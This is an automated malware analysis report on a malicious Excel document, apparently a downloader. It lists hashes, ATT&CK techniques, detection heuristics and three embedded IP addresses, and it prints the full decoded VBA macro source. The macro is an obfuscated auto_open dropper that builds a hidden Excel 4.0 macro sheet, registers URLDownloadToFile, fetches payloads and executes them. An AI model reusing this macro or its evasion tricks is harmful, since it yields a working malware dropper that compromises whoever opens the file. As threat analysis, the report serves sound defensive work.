Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 afa3e9f1e2e8ef35…

MALICIOUS

Office (OLE)

Size: 129.5 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-10-14
MD5: 24b4d9a5b97f3c5e3868994f514e8092
SHA-1: e82267be7ddec14daa40ec3d08bd1f4e4cbb9eb9
SHA-256: afa3e9f1e2e8ef35f6e723c140476d644698b01eef19742cefac117e640797a4
Risk Score: 158

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file contains VBA macros, including Auto_Open and Auto_Close, which are commonly used to execute malicious code upon opening or closing a document. The presence of the URLDownloadToFile API call strongly suggests that the macros are intended to download and execute a second-stage payload from one of the embedded URLs. The ClamAV detection also confirms its malicious nature as a downloader.

Heuristics (6)

  • ClamAV: Doc.Downloader.Docusign112100-9908075-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Docusign112100-9908075-0
  • Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (low, OLE_VBA_AUTO)
    Matched lines in script:
      Sub auto_open()
      On Error Resume Next
  • Auto_Close macro (low, OLE_VBA_AUTOCLOSE)
    Matched lines in script:
      End Function
      Sub auto_close()
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://190.14.37.165/ (in document text, OLE body)
      • http://5.196.247.11/ (in document text, OLE body)
      • http://188.119.113.3/ (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4585 bytes
SHA-256: fde66e20711a7f15978b94a5a866f07b9d20ea1d8f560b84fb649e896abaaf38

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
    On Error Resume Next
Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "R" & "E" & "G" & "I" & "STER"
Drezden = "="
Naret = "E" & "X" & "E" & "C"
DUJSKFASD = UserForm2.Label5.Caption
Application.ScreenUpdating = False
jgfjgjfhfhf
Sheets("Sheettt").Visible = False
Sheets("Sheettt").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheettt").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheettt").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheettt").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()"
Sheets("Sheettt").Range("K18") = ".d" & "a" & "t"



Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()"
Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
Sheets("Sheettt").Range("I10") = UserForm2.Caption
Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheettt").Range("I12") = "Byukilos"
Sheets("Sheettt").Range("G10") = "..\Celod.wac"
Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
Sheets("Sheettt").Range("I17") = DUJSKFASD
Sheets("Sheettt").Range("I18") = DUJSKFASD & "1"
Sheets("Sheettt").Range("I19") = DUJSKFASD & "2"
Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheettt").Range("H1")

End Sub





Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheettt"
End Function
Sub auto_close()


Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheettt").Delete
   Application.DisplayAlerts = True

End Sub